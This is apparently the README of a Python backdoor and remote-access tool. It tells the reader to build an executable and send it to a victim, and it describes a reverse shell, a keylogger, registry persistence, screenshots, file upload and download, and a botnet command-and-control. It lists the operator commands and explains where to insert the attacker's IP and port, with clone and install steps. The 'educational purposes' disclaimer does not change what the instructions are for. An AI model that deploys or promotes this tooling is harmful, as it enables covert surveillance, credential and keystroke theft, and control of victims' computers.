- Please use this program only for educational purposes.
- It is not meant to be used in any malicious way, and I decline any responsibility for what you do with it.
- Just create exe and send to the victim.
- In exe include keylogger also
- It is based on TCP and IPv4 connection.
- It will create a reverse shell connecion form victim system.
- It has command like persistence to boot itself when system restart , it also have keylogger, upload and download.
- It also have cnc or we call botnet.
quit --> Quit Session With The Target
clear --> Clear The Screen
cd *Directory Name* --> Changes Directory On Target System
upload *file name* --> Upload File To The target Machine
download *file name* --> Download File From Target Machine
keylog_start --> Start The Keylogger
keylog_dump --> Print Keystrokes That The Target Inputted
keylog_stop --> Stop And Self Destruct Keylogger File
persistence *RegName* *fileName* --> Create Persistence In Registry'''),'green')
screenshot --> To Take Screenshot of victim screen
- Put your ip and port at there place (sock.bind(('127.0.0.1', 4444))) like this at line 84 in server for backdoor at line 62 and in cnc at line 103.
git clone https://github.com/Malwareman007/malwareman_backdoor.git
cd malwareman_backdoor/setup
python3 -m pip install --no-cache-dir -r requirements.txt
Contributions, issues and feature requests are welcome!
Feel free to check issues page.
Give a ⭐️ if this helped you!